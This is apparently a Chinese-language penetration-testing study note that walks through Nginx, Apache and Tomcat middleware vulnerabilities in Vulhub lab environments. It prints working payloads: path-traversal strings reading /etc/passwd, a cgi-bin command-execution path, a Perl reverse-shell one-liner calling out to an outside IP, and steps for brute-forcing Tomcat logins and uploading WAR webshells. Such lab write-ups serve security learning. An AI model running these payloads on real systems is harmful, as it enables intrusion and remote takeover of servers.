目录
案例二: 中间件-Apache-RCE&目录遍历&文件解析等
思维导图
中间件以及框架列表:
IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere,Jenkins,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery
案例一:中间件-Nginx-文件解析&命令执行等
nginx解析漏洞:
配置不当造成的解析漏洞
靶场环境:Vulhub - Docker-Compose file for vulnerability environment
上传图片时抓包
发送到repeater,文章末尾加入,php代码,右侧可以看到上传路径访问图片
加上/1.php
文件名逻辑漏洞
靶场:Vulhub - Docker-Compose file for vulnerability environment
留一个空格
加入脚本
重新抓包访问,留两个空格加上.php
hex 0x20 0x00.php
成功返回php
案例二: 中间件-Apache-RCE&目录遍历&文件解析等
Apache-RCE
靶场环境:Vulhub - Docker-Compose file for vulnerability environment
访问路径:
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
反弹shell的脚本
echo;perl -e 'use Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
访问抓包
开启监听
运行成功反弹shell
目录穿越漏洞
前提条件:
- 版本等于2.4.49
- 穿越的目录允许被访问,比如配置了
<Directory />Require all granted</Directory>
。(默认情况下是不允许的)
可以帮助看到web目录外,别的系统配置文件
靶场环境:https://vulhub.org/#/environments/httpd/CVE-2021-41773/
利用icon目录必须是一个真实存在的目录,%2e为 "."
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
如果cgi和cgid模块被设置了,那么可以进行命令执行
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
文件解析
利用条件:
1.黑名单验证,不能上传 php
2.能够上传
靶场环境: https://vulhub.org/#/environments/httpd/CVE-2017-15715/
上传php文件,会显示不能上传
上传的时候抓包
发送到repeater修改
把空格改为%0a
成功访问
案例三:中间件-Tomcat-弱口令&文件上传&文件包含等
弱口令
tomcat通过爆破弱口令能够进入后台终端,取得webshell权限
靶场环境:https://vulhub.org/#/environments/tomcat/tomcat8/
加上默认地址 /manager/html
登录抓包:
该数据为账号:密码的base64位编码
发送到intruder爆破,添加变量
设置字典
成功暴力破解
文件上传
补充知识点:
war文件是一种web应用程序格式,包含了一个项目中所有源码的集合并按一定的目录结构组织,由于将所有文件合并成一个文件,因此节省了文件的传输时间。可以将其放在tomcat下的webapps目录中打开并运行
找一个jsp编写的大马,把他压缩为war后缀的。
上传jshell文件
这里大马的账号密码为
访问大马 根目录/jshell/jshell.jsp
功能截图
哥斯拉下载地址:Release v4.0.1-godzilla · BeichenDream/Godzilla · GitHub
从网上下载哥斯拉
运行
生成木马
压缩为war后缀
访问页面为空白
用哥斯拉连接
添加后执行
CVE-2017-12615,可以采用put形式进行上传
靶场: https://vulhub.org/#/environments/tomcat/CVE-2017-12615/
搭建起来以后,抓包,put方式上传
哥斯拉测试连接
文件包含
漏洞利用工具:GitHub - sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read: Tomcat的文件包含及文件读取漏洞利用POC
执行该脚本如果有返回值说明有漏洞